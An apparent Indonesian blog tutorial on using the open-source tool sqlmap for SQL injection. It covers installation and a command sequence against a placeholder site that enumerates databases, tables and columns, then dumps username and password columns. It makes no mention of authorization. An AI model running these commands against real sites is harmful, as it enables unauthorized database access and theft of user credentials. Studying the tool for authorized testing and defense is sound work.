Di tutorial sebelumnya kita telah membahas exploitasi bug ini dengan cara manual, sehingga pada pembahasan kali ini saya akan membahas tutorial SQL injection menggunakan tools sqlmap.
Apa itu sqlmap? sqlmap adalah alat penguji penetrasi open source yang mengeksploitasi kelemahan SQL injection, membaca data sensitif dari database bahkan bisa memodifikasi nya.
Baca juga: tutorial exploitasi bug SQL injection
Menginstall Sqlmap
Tools sqlmap ini sudah tersedia di linux, apabila tidak ada kalian bisa mendownload nya disini
Apabila menggunakan windows atau android, kalian bisa mendownload zip file nya disini.
Pastikan python sudah terinstall terlebih dahulu, karena sqlmap menggunakan bahasa program ini, sehingga tools bisa berjalan lancar. Apabila file sudah terdownload, ekstrak file nya kemudian jalankan dengan perintah
python2 sqlmap.py
python2 sqlmap.py -hh
Exploitasi
Jika sudah terinstall langsung eksekusi web nya dengan perintah “python2 sqlmap.py -u site.com –dbs”
Perintah diatas dijalankan untuk mendapatkan database nya terlebih dahulu, kalian ikuti saja apa yang diminta oleh sqlmap sampai mendapatkan nama database nya.
Jika sudah dapat nama database nya langsung eksekusi tabel nya dengan perintah “python2 sqlmap.py -u site.com –tables -D namadatabase”
Nama tabel sudah terlihat, langsung eksekusi kolom nya dengan perintah “python2 sqlmap.py -u site.com –columns -T usr -D namadatabase”
Jika sudah terlihat, tinggal pilih saja kolom mana yang mau kalian dump, disini saya akan memilih usr_name dan usr_pwd , sehingga perintahnya akan menjadi “python2 sqlmap.py -u site.com –dump -C usr_name,usr_pwd -T usr -D namadatabase”
Seperti yang kalian lihat, kolom nya telah berhasil kita dump :D. Ada banyak perintah yang bisa dipakai di sqlmap ini, tentu saja sesuai kondisi. Mungkin itu saja tutorial kali ini sampai jumpa pada artikel selanjutnya.